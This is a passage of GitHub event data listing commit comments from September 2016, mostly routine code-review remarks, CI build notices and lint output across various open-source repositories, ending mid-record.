{"id":"4548011606","type":"CommitCommentEvent","actor":{"login":"unity"},"repo":{"name":"joetannenbaum/n1-avatars"},"payload":{"comment":{"id":18981470,"position":null,"line":null,"path":null,"commit_id":"9c5c74ac7d0d07a7e94f7804a53fc3b414b343f5","created_at":"2016-09-12T08:40:09Z","updated_at":"2016-09-12T08:40:09Z","body":"Nice refactor. If you make it a PR I'll merge!"}},"created_at":"2016-09-12T08:40:09Z"}
{"id":"4548012524","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981472,"position":28,"line":28,"path":"readme.md","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:40:22Z","updated_at":"2016-09-12T08:40:22Z","body":"This should better be `process.stdout.write(…)`, as `console.log` may \"beautify\" the passed data."}},"created_at":"2016-09-12T08:40:22Z"}
{"id":"4548012662","type":"CommitCommentEvent","actor":{"login":"tomskii"},"repo":{"name":"tomskii/rt-country-selector"},"payload":{"comment":{"id":18981473,"position":null,"line":null,"path":null,"commit_id":"e146acc9fbf3db086c50f0b04414f21541060940","created_at":"2016-09-12T08:40:23Z","updated_at":"2016-09-12T08:40:23Z","body":"sadaS"}},"created_at":"2016-09-12T08:40:23Z"}
{"id":"4548013050","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981476,"position":null,"line":null,"path":null,"commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:40:28Z","updated_at":"2016-09-12T08:40:28Z","body":"Let's try to keep simple file naming convention. \r\n\r\nPlease rename:\r\n- `src/bpm-show-locationsForApp.coffee` to `src/bpm-show-locations.coffee`\r\n- `src/bpm-show-transactionsForApp.coffee` to `src/bpm-show-transactions.coffee`"}},"created_at":"2016-09-12T08:40:28Z"}
{"id":"4548013256","type":"CommitCommentEvent","actor":{"login":"notriddle"},"repo":{"name":"anacrolix/torrent"},"payload":{"comment":{"id":18981477,"position":null,"line":null,"path":null,"commit_id":"b5ed171ac526856dda367d8bcdb5b8940421acd6","created_at":"2016-09-12T08:40:31Z","updated_at":"2016-09-12T08:40:31Z","body":"You're fast! Thanks!"}},"created_at":"2016-09-12T08:40:31Z"}
{"id":"4548014948","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981482,"position":32,"line":32,"path":"index.js","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:40:56Z","updated_at":"2016-09-12T08:40:56Z","body":"Maybe you can use [`geojson-flatten`](https://github.com/mapbox/geojson-flatten) here."}},"created_at":"2016-09-12T08:40:56Z"}
{"id":"4548017651","type":"CommitCommentEvent","actor":{"login":"Oneiroi"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18981487,"position":11,"line":141,"path":"proxysql-admin-tool.sh","commit_id":"8997b55846ff1ee9469c2c3c3bcdeed14fcca145","created_at":"2016-09-12T08:41:36Z","updated_at":"2016-09-12T08:41:36Z","body":"typo ? `PROXYSQ_GALERA_CHECK` should be `PROXYSQ**L**_GALERA_CHECK`  ?"}},"created_at":"2016-09-12T08:41:36Z"}
{"id":"4548020564","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981489,"position":41,"line":41,"path":"src/bpm-show-locationsForApp.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:42:19Z","updated_at":"2016-09-12T08:42:19Z","body":"this part returns in all 3 files see if you can reuse it\r\nMaybe consider to create LWSSO script in lib"}},"created_at":"2016-09-12T08:42:19Z"}
{"id":"4548020955","type":"CommitCommentEvent","actor":{"login":"derhuerst"},"repo":{"name":"juliuste/geojson-svgify"},"payload":{"comment":{"id":18981492,"position":8,"line":8,"path":"readme.md","commit_id":"57b5730ee13a79829cae2ba42e78c0165a7407fd","created_at":"2016-09-12T08:42:25Z","updated_at":"2016-09-12T08:42:25Z","body":"This should be `[![ISC License](https://img.shields.io/github/license/juliuste/geojson-svgify.svg)](https://opensource.org/licenses/ISC)."}},"created_at":"2016-09-12T08:42:25Z"}
{"id":"4548024216","type":"CommitCommentEvent","actor":{"login":"kdambekalns"},"repo":{"name":"neos/redirecthandler-databasestorage"},"payload":{"comment":{"id":18981497,"position":37,"line":166,"path":"Classes/RedirectStorage.php","commit_id":"4c665b5cecd8c47df8e6b3d48e5d43eef1061202","created_at":"2016-09-12T08:43:11Z","updated_at":"2016-09-12T08:43:11Z","body":"`flushCachesForUriPath()` expects a string - not an object!"}},"created_at":"2016-09-12T08:43:11Z"}
{"id":"4548034606","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18981512,"position":null,"line":null,"path":null,"commit_id":"8930eae9cd0559b09ef54ecd7aadb183291ab30f","created_at":"2016-09-12T08:45:33Z","updated_at":"2016-09-12T08:45:33Z","body":"Only MonitorButton.qml should have been part of this commit. Something went awry between the previous and the following merge commits."}},"created_at":"2016-09-12T08:45:33Z"}
{"id":"4548036794","type":"CommitCommentEvent","actor":{"login":"baixiaoyu"},"repo":{"name":"box/Anemometer"},"payload":{"comment":{"id":18981516,"position":null,"line":null,"path":null,"commit_id":"27c9afd3b3d18e00120e2eba66a0997b4a2de63f","created_at":"2016-09-12T08:46:03Z","updated_at":"2016-09-12T08:46:03Z","body":"hi,i have a question ,hostname_max should have hostname and port information,but in fact it just has hostname ,how can i get ip:port, it seems pt-query-digest only put hostname into hostname_max. when anemometer get sql execution plan, it gets hostname and port from\r\nhostname_max\r\n $pos = strpos($sample['hostname_max'], ':');\r\n                if ($pos === false)\r\n                {\r\n                        $conn['port'] = 3306;\r\n                        $conn['host'] = $sample['hostname_max'];\r\n                }\r\n                else\r\n                {\r\n                        $parts = preg_split(\"/:/\", $sample['hostname_max']);\r\n                        $conn['host'] = $parts[0];\r\n                        $conn['port'] = $parts[1];\r\n                } "}},"created_at":"2016-09-12T08:46:03Z"}
{"id":"4548040603","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18981523,"position":null,"line":null,"path":null,"commit_id":"f325b6c46465ba2f07f7453567ba9ecbe6743f35","created_at":"2016-09-12T08:46:55Z","updated_at":"2016-09-12T08:46:55Z","body":"[R/collect_file_esses.R:30:37:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L30) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     pi  = rep(seq(1, n_beast_runs   ), times = n_species_trees * n_alignments),\n                                    ^\n```\n[R/collect_file_esses.R:39:1:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​     sti = rep(seq(1, n_species_trees), each = n_alignments * n_beast_runs, times = 1),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/collect_file_esses.R:40:1:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L40) *style:* **lines should not be more than 80 characters.**\n```r\n​     ai  = rep(seq(1, n_alignments   ), each = n_beast_runs, times = n_species_trees),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/collect_file_esses.R:51:1:](https://github.com/richelbilderbeek/Cer2016/blob/f325b6c46465ba2f07f7453567ba9ecbe6743f35/R/collect_file_esses.R#L51) *style:* **lines should not be more than 80 characters.**\n```r\n​            traces = Cer2016::get_posterior(file, sti = sti, ai = ai, pi = pi)$estimates,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-12T08:46:55Z"}
{"id":"4548041785","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981524,"position":84,"line":84,"path":"src/bpm-show-locationsForApp.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:47:12Z","updated_at":"2016-09-12T08:47:12Z","body":"This part returns in all 3 files, see if you can reuse it, maybe consider to create some HTTP helper script in lib. "}},"created_at":"2016-09-12T08:47:12Z"}
{"id":"4548042252","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981525,"position":null,"line":null,"path":null,"commit_id":"bae540fe9bc4dcd77b0ce46dbf6ef3d533486a97","created_at":"2016-09-12T08:47:17Z","updated_at":"2016-09-12T08:47:17Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 235](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1191&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:25:28"}},"created_at":"2016-09-12T08:47:17Z"}
{"id":"4548042320","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18981526,"position":null,"line":null,"path":null,"commit_id":"6530a6d8ebbdadbc45fe279102ff49ddb73d043d","created_at":"2016-09-12T08:47:18Z","updated_at":"2016-09-12T08:47:18Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 236](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1192&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T08:47:18Z"}
{"id":"4548045081","type":"CommitCommentEvent","actor":{"login":"amiryal"},"repo":{"name":"hashicorp/vault-rails"},"payload":{"comment":{"id":18981532,"position":6,"line":65,"path":"lib/vault/rails.rb","commit_id":"07399786d9fc09c295e93af0df87023eaf26c827","created_at":"2016-09-12T08:47:56Z","updated_at":"2016-09-12T08:47:56Z","body":"Good point. Do you know what would happen if I remove the following lines from Vault, or should I try it out myself?\r\n\r\n```go\r\n\tif len(value) == 0 {\r\n\t\treturn logical.ErrorResponse(\"missing plaintext to encrypt\"), logical.ErrInvalidRequest\r\n\t}\r\n```\r\n\r\n```go\r\n\tif plaintext == \"\" {\r\n\t\treturn nil, fmt.Errorf(\"empty plaintext returned\")\r\n\t}\r\n```\r\n\r\nI never worked with Go before, but according to what you said, this would mean that Vault will not be able to tell the difference between requests that don’t specify plaintext at all and requests that specify the empty string. If documented properly, that sounds like a reasonable compromise to me."}},"created_at":"2016-09-12T08:47:56Z"}
{"id":"4548047506","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18981538,"position":null,"line":null,"path":null,"commit_id":"782577e907c91239a51b812fcdd64aedd60610bb","created_at":"2016-09-12T08:48:27Z","updated_at":"2016-09-12T08:48:27Z","body":"Related to: backdrop/backdrop-issues#1042 "}},"created_at":"2016-09-12T08:48:27Z"}
{"id":"4548048894","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981539,"position":48,"line":48,"path":"src/bpm-show-apps.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:48:45Z","updated_at":"2016-09-12T08:48:45Z","body":"Gor all free files:\r\nThe highlighted values should come from configuration.\r\n\r\nuserlogin=**admin**\r\nuserloginValue=**admin**\r\nuserpassword=**admin**"}},"created_at":"2016-09-12T08:48:45Z"}
{"id":"4548049147","type":"CommitCommentEvent","actor":{"login":"bennuttall"},"repo":{"name":"raspberrypilearning/balloon-pi-tay-popper"},"payload":{"comment":{"id":18981540,"position":null,"line":null,"path":null,"commit_id":"4dfecddb5794538e14239ebf7555603f43d7a7c2","created_at":"2016-09-12T08:48:48Z","updated_at":"2016-09-12T08:48:48Z","body":"Now broken: https://www.raspberrypi.org/learning/balloon-pi-tay-popper/requirements/"}},"created_at":"2016-09-12T08:48:48Z"}
{"id":"4548049625","type":"CommitCommentEvent","actor":{"login":"schmittjoh"},"repo":{"name":"schmittjoh/serializer"},"payload":{"comment":{"id":18981542,"position":null,"line":null,"path":null,"commit_id":"774d4fc41d16b013e2e851596c4c697a663d4952","created_at":"2016-09-12T08:48:54Z","updated_at":"2016-09-12T08:48:54Z","body":"Yeah, we can enable it on Travis, but it seems difficult to run an assertion on it (you would need to compare it to a run on the old code).\r\n\r\nI'm also not sure if we have something in the benchmark which uses groups, but just my feeling from looking at the PR is that we have some more loops to go through for each property."}},"created_at":"2016-09-12T08:48:54Z"}
{"id":"4548050660","type":"CommitCommentEvent","actor":{"login":"BasurmaninPro"},"repo":{"name":"BasurmaninPro/coffee"},"payload":{"comment":{"id":18981546,"position":null,"line":null,"path":null,"commit_id":"106663229ed68acce894d64afb786273ece54a87","created_at":"2016-09-12T08:49:08Z","updated_at":"2016-09-12T08:49:08Z","body":"<p>hello pull</p>"}},"created_at":"2016-09-12T08:49:08Z"}
{"id":"4548051802","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18981547,"position":null,"line":null,"path":null,"commit_id":"03ee8544bcfa40379b855509f0e848c507fe1143","created_at":"2016-09-12T08:49:20Z","updated_at":"2016-09-12T08:49:20Z","body":"Automatic build report for commit 03ee8544bcfa40379b855509f0e848c507fe1143:\n\n"}},"created_at":"2016-09-12T08:49:20Z"}
{"id":"4548054377","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981554,"position":48,"line":48,"path":"src/bpm-show-locationsForApp.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:49:56Z","updated_at":"2016-09-12T08:49:56Z","body":"The highlighted values should come from configuration.\r\n- userlogin=**admin**\r\n- userloginValue=**admin**\r\n- userpassword=**admin**"}},"created_at":"2016-09-12T08:49:56Z"}
{"id":"4548055015","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981555,"position":48,"line":48,"path":"src/bpm-show-transactionsForApp.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:50:06Z","updated_at":"2016-09-12T08:50:06Z","body":"The highlighted values should come from configuration.\r\n- userlogin=**admin**\r\n- userloginValue=**admin**\r\n- userpassword=**admin**"}},"created_at":"2016-09-12T08:50:06Z"}
{"id":"4548057408","type":"CommitCommentEvent","actor":{"login":"shengfenglai"},"repo":{"name":"shengfenglai/demo"},"payload":{"comment":{"id":18981560,"position":null,"line":null,"path":null,"commit_id":"2cc4571da9a577305a298340da0b0a0bfc8508ec","created_at":"2016-09-12T08:50:36Z","updated_at":"2016-09-12T08:50:36Z","body":"print： 1"}},"created_at":"2016-09-12T08:50:36Z"}
{"id":"4548060097","type":"CommitCommentEvent","actor":{"login":"ifndefdeadmau5"},"repo":{"name":"sv-bootcamp/yoda"},"payload":{"comment":{"id":18981563,"position":30,"line":78,"path":"gulpfile.js","commit_id":"995a8ff70fb89bc95119af92f2bc0b43f8523070","created_at":"2016-09-12T08:51:12Z","updated_at":"2016-09-12T08:51:12Z","body":"Why double quote? just curious"}},"created_at":"2016-09-12T08:51:12Z"}
{"id":"4548060258","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981564,"position":97,"line":97,"path":"src/bpm-show-transactionsForApp.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:51:14Z","updated_at":"2016-09-12T08:51:14Z","body":"missing new line in the end of file"}},"created_at":"2016-09-12T08:51:14Z"}
{"id":"4548060771","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981566,"position":94,"line":94,"path":"src/bpm-show-locationsForApp.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:51:21Z","updated_at":"2016-09-12T08:51:21Z","body":"missing new line in the end of file"}},"created_at":"2016-09-12T08:51:21Z"}
{"id":"4548061618","type":"CommitCommentEvent","actor":{"login":"mmishalov"},"repo":{"name":"HPSoftware/hubot-bpm"},"payload":{"comment":{"id":18981570,"position":94,"line":94,"path":"src/bpm-show-apps.coffee","commit_id":"68bd88b37061f6fe8f88032ba59d3b26734a0bd7","created_at":"2016-09-12T08:51:31Z","updated_at":"2016-09-12T08:51:31Z","body":"missing new line in the end of file"}},"created_at":"2016-09-12T08:51:31Z"}
{"id":"4548064155","type":"CommitCommentEvent","actor":{"login":"Vampire"},"repo":{"name":"spockframework/spock"},"payload":{"comment":{"id":18981573,"position":437,"line":437,"path":"docs/interaction_based_testing.adoc","commit_id":"3a6e4d5283b514d0b680aa2aa8f58e7112a8a8c5","created_at":"2016-09-12T08:52:03Z","updated_at":"2016-09-12T08:52:03Z","body":"Shouldn't this and the other `then` block be `1 * subscriber.receive(\"message1\")`? The docu said previously a simple method call like this will not be recognized as interaction."}},"created_at":"2016-09-12T08:52:03Z"}
{"id":"4548066164","type":"CommitCommentEvent","actor":{"login":"wujixialan"},"repo":{"name":"wujixialan/xialan"},"payload":{"comment":{"id":18981577,"position":15,"line":15,"path":"new","commit_id":"8a6b6e82acca39669ad25c8272e600e8d196bda4","created_at":"2016-09-12T08:52:29Z","updated_at":"2016-09-12T08:52:29Z","body":"八点半吧DVD版"}},"created_at":"2016-09-12T08:52:29Z"}
{"id":"4548068232","type":"CommitCommentEvent","actor":{"login":"ChristianRamseier"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":18981582,"position":null,"line":null,"path":null,"commit_id":"183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9","created_at":"2016-09-12T08:52:56Z","updated_at":"2016-09-12T08:52:56Z","body":"This commit breaks font loading in IE11 and as much as i hate IE, it's correct without the comma: http://www.w3.org/TR/css-fonts-3/#descdef-src"}},"created_at":"2016-09-12T08:52:56Z"}
{"id":"4548069854","type":"CommitCommentEvent","actor":{"login":"michael-o"},"repo":{"name":"mpet/maven-plugins"},"payload":{"comment":{"id":18981587,"position":1,"line":1,"path":"maven-changes-plugin/.gitignore","commit_id":"46df011b2c0c3aada2691409e1a7f3980232516a","created_at":"2016-09-12T08:53:18Z","updated_at":"2016-09-12T08:53:18Z","body":"Where does this `bin` come from?"}},"created_at":"2016-09-12T08:53:18Z"}
{"id":"4548071544","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18981590,"position":61,"line":292,"path":"Library/Homebrew/dev-cmd/bottle.rb","commit_id":"9b5c45a7df6a9a170389d6045bf06803fe4bc78b","created_at":"2016-09-12T08:53:41Z","updated_at":"2016-09-12T08:53:41Z","body":"Hmm, are these debug statements?"}},"created_at":"2016-09-12T08:53:41Z"}
{"id":"4548073818","type":"CommitCommentEvent","actor":{"login":"goetas"},"repo":{"name":"schmittjoh/serializer"},"payload":{"comment":{"id":18981596,"position":null,"line":null,"path":null,"commit_id":"774d4fc41d16b013e2e851596c4c697a663d4952","created_at":"2016-09-12T08:54:10Z","updated_at":"2016-09-12T08:54:10Z","body":"https://github.com/schmittjoh/serializer/pull/647 is for the benchmarks (but travis looks to have some troubles :disappointed:  )"}},"created_at":"2016-09-12T08:54:10Z"}
{"id":"4548074694","type":"CommitCommentEvent","actor":{"login":"wujixialan"},"repo":{"name":"wujixialan/xialan"},"payload":{"comment":{"id":18981598,"position":13,"line":13,"path":"new","commit_id":"8a6b6e82acca39669ad25c8272e600e8d196bda4","created_at":"2016-09-12T08:54:20Z","updated_at":"2016-09-12T08:54:20Z","body":"对对对"}},"created_at":"2016-09-12T08:54:20Z"}
{"id":"4548076007","type":"CommitCommentEvent","actor":{"login":"wujixialan"},"repo":{"name":"wujixialan/xialan"},"payload":{"comment":{"id":18981601,"position":12,"line":12,"path":"new","commit_id":"8a6b6e82acca39669ad25c8272e600e8d196bda4","created_at":"2016-09-12T08:54:36Z","updated_at":"2016-09-12T08:54:36Z","body":"对对对"}},"created_at":"2016-09-12T08:54:36Z"}
{"id":"4548076822","type":"CommitCommentEvent","actor":{"login":"mizdebsk"},"repo":{"name":"fedora-java/xmvn"},"payload":{"comment":{"id":18981602,"position":null,"line":null,"path":null,"commit_id":"c94eb0c88c67d9dee7889da88e41ee65e5e3f76c","created_at":"2016-09-12T08:54:46Z","updated_at":"2016-09-12T08:54:46Z","body":"@rvais @msimacek FYI, bisect should be fixed."}},"created_at":"2016-09-12T08:54:46Z"}
{"id":"4548079058","type":"CommitCommentEvent","actor":{"login":"CodeEagle"},"repo":{"name":"CodeEagle/SSImageBrowser"},"payload":{"comment":{"id":18981605,"position":2237,"line":1044,"path":"Source/SSImageBrowser.swift","commit_id":"4fe9752b9390a9fd90be8255f776db1adfa5d021","created_at":"2016-09-12T08:55:18Z","updated_at":"2016-09-12T08:55:18Z","body":"weak"}},"created_at":"2016-09-12T08:55:18Z"}
{"id":"4548084969","type":"CommitCommentEvent","actor":{"login":"pjsong"},"repo":{"name":"pjsong/angular2-hero-steps"},"payload":{"comment":{"id":18981615,"position":9,"line":9,"path":"app/hero.service.ts","commit_id":"6d6a6f563f1ebcb1bf0129a9faa88889b8102d36","created_at":"2016-09-12T08:56:33Z","updated_at":"2016-09-12T08:56:33Z","body":"https://www.promisejs.org/patterns/\r\nhttps://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise/resolve"}},"created_at":"2016-09-12T08:56:33Z"}
{"id":"4548085470","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981617,"position":5,"line":5,"path":"numberToTextConverter/src/main/java/com/spark/NumberToTextConverter.java","commit_id":"b73c89459ccc5051afcacdd0318a399bf1462434","created_at":"2016-09-12T08:56:39Z","updated_at":"2016-09-12T08:56:39Z","body":"string should be the return type.. \r\nthe commit should have had a test "}},"created_at":"2016-09-12T08:56:39Z"}
{"id":"4548089112","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981622,"position":null,"line":null,"path":null,"commit_id":"bf4fc362621c7ae44bdecc0892701533236ffe99","created_at":"2016-09-12T08:57:28Z","updated_at":"2016-09-12T08:57:28Z","body":"no test still ?? TDD means that you make small functional changes only after test. read about the \"red green refactor\" loop"}},"created_at":"2016-09-12T08:57:28Z"}
{"id":"4548089266","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"juggernautsei/openemr"},"payload":{"comment":{"id":18981623,"position":null,"line":null,"path":null,"commit_id":"0cbc00e1cb70d7f57f720baf766b1558fda4f351","created_at":"2016-09-12T08:57:30Z","updated_at":"2016-09-12T08:57:30Z","body":"Regarding zend, just keep doing what you are doing(you won't need the autoloader very soon, since Scott is migrating zend library into main vendor component that will always be autoloaded)."}},"created_at":"2016-09-12T08:57:30Z"}
{"id":"4548091190","type":"CommitCommentEvent","actor":{"login":"GeertvanHorrik"},"repo":{"name":"Catel/Catel"},"payload":{"comment":{"id":18981626,"position":10,"line":325,"path":"src/Catel.Core/Catel.Core.NET40/IoC/TypeFactory.cs","commit_id":"27c6c67475574d1c58672a05bafe0a3752b1e98f","created_at":"2016-09-12T08:57:56Z","updated_at":"2016-09-12T08:57:56Z","body":"Good catch, fixed for v5"}},"created_at":"2016-09-12T08:57:56Z"}
{"id":"4548091436","type":"CommitCommentEvent","actor":{"login":"rameshvs02"},"repo":{"name":"Percona-QA/proxysql-admin-tool"},"payload":{"comment":{"id":18981627,"position":11,"line":141,"path":"proxysql-admin-tool.sh","commit_id":"8997b55846ff1ee9469c2c3c3bcdeed14fcca145","created_at":"2016-09-12T08:58:00Z","updated_at":"2016-09-12T08:58:00Z","body":"Yes, will fix the issue."}},"created_at":"2016-09-12T08:58:00Z"}
{"id":"4548091890","type":"CommitCommentEvent","actor":{"login":"TorsteinHonsi"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":18981628,"position":null,"line":null,"path":null,"commit_id":"59416040f35b083fe346a5c9d2c924652bbfb4a0","created_at":"2016-09-12T08:58:07Z","updated_at":"2016-09-12T08:58:07Z","body":"Thanks for the fix! For future fixes, please tag Highstock and Highmaps fixes with `Highstock: ` and `Highmaps: `. It will be picked up when the changelog is created and saves some time then."}},"created_at":"2016-09-12T08:58:07Z"}
{"id":"4548091952","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981629,"position":null,"line":null,"path":null,"commit_id":"8784c57030d0e56055d1b17ada9077b54dae0ab6","created_at":"2016-09-12T08:58:09Z","updated_at":"2016-09-12T08:58:09Z","body":"much better. \r\n\r\nAs a style I would like { to be on the same line.. Very minor.."}},"created_at":"2016-09-12T08:58:09Z"}
{"id":"4548093655","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18981632,"position":null,"line":null,"path":null,"commit_id":"9b5c45a7df6a9a170389d6045bf06803fe4bc78b","created_at":"2016-09-12T08:58:31Z","updated_at":"2016-09-12T08:58:31Z","body":"Overall weird stuff are being printed, see e.g. https://bot.brew.sh/job/Homebrew%20Sierra%20Testing/688/version=sierra_2/console and https://bot.brew.sh/job/Homebrew%20Sierra%20Testing/689/version=sierra_2/console. I'm not sure why, though."}},"created_at":"2016-09-12T08:58:31Z"}
{"id":"4548094971","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18981633,"position":61,"line":292,"path":"Library/Homebrew/dev-cmd/bottle.rb","commit_id":"9b5c45a7df6a9a170389d6045bf06803fe4bc78b","created_at":"2016-09-12T08:58:46Z","updated_at":"2016-09-12T08:58:46Z","body":"Yes: https://github.com/Homebrew/brew/pull/942"}},"created_at":"2016-09-12T08:58:46Z"}
{"id":"4548095238","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18981634,"position":null,"line":null,"path":null,"commit_id":"9b5c45a7df6a9a170389d6045bf06803fe4bc78b","created_at":"2016-09-12T08:58:50Z","updated_at":"2016-09-12T08:58:50Z","body":"https://github.com/Homebrew/brew/pull/942"}},"created_at":"2016-09-12T08:58:50Z"}
{"id":"4548096982","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":18981640,"position":null,"line":null,"path":null,"commit_id":"0fa3e3606dcdc71266d5a3051b5e74526996ee4e","created_at":"2016-09-12T08:59:13Z","updated_at":"2016-09-12T08:59:13Z","body":"Can you please ensure that the commit has both the test case and the functional code you have developed.. \r\n\r\nthanks\r\n"}},"created_at":"2016-09-12T08:59:13Z"}
{"id":"4548101374","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Stellarspace/CloneWarsAdventures"},"payload":{"comment":{"id":18981650,"position":null,"line":null,"path":null,"commit_id":"ae5fe58c01668831c83ef63b92aa79b6b9aee849","created_at":"2016-09-12T09:00:12Z","updated_at":"2016-09-12T09:00:12Z","body":"These are all useless files."}},"created_at":"2016-09-12T09:00:12Z"}
{"id":"4548103944","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18981659,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-12T09:00:42Z","updated_at":"2016-09-12T09:00:42Z","body":"Pull request is here [https://github.com/official-stockfish/Stockfish/pull/798]"}},"created_at":"2016-09-12T09:00:42Z"}
{"id":"4548107318","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":18981664,"position":null,"line":null,"path":null,"commit_id":"9b5c45a7df6a9a170389d6045bf06803fe4bc78b","created_at":"2016-09-12T09:01:25Z","updated_at":"2016-09-12T09:01:25Z","body":"Sample output:\r\n\r\n```\r\n ==> Bottling pygobject-2.28.6_1.sierra.bottle.tar.gz...\r\n/usr/bin/touch -h -t 201106131735.44 /usr/local/Cellar/pygobject/2.28.6_1/lib/libpyglib-2.0-python.dylib\r\ntar cf /Users/brew/Jenkins/testing-10-11/version/sierra_2/pygobject-2.28.6_1.sierra.bottle.tar pygobject/2.28.6_1\r\ngzip -f pygobject-bottle.tar\r\nnil\r\n\"https://homebrew.bintray.com/bottles\"\r\n\"https://homebrew.bintray.com/bottles\"\r\n./pygobject-2.28.6_1.sierra.bottle.json\r\n  bottle do\r\n    cellar :any\r\n    sha256 \"9a10d979f637cfc9abc46839fa470672ee97a33be5f8ea9a8b725d44f60ed0ba\" => :sierra\r\n  end\r\n --keep-old\r\n==> 